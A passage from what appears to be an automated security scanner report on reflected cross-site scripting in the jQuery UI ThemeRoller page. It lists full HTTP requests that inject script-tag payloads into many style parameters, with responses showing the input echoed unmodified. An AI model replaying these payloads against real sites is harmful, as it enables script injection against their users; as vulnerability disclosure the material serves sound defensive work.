GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7769a"><script>alert(1)</script>1f24aa516b9 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a1"><script>alert(1)</script>07a06ed0f2b was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f6c"><script>alert(1)</script>4d606b712ae was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e1d"><script>alert(1)</script>b0705c51f was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 119997
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ba"><script>alert(1)</script>c860704192d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5e2"><script>alert(1)</script>5ad0d53056f was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb42"><script>alert(1)</script>d0177921a09 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540e"><script>alert(1)</script>2fec129ecd0 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7403f"><script>alert(1)</script>521994f8e38 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>8a9102a62ac was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989c9"><script>alert(1)</script>521a1604b00 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa52a"><script>alert(1)</script>8067e0305a5 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45300"><script>alert(1)</script>52b8cc61183 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
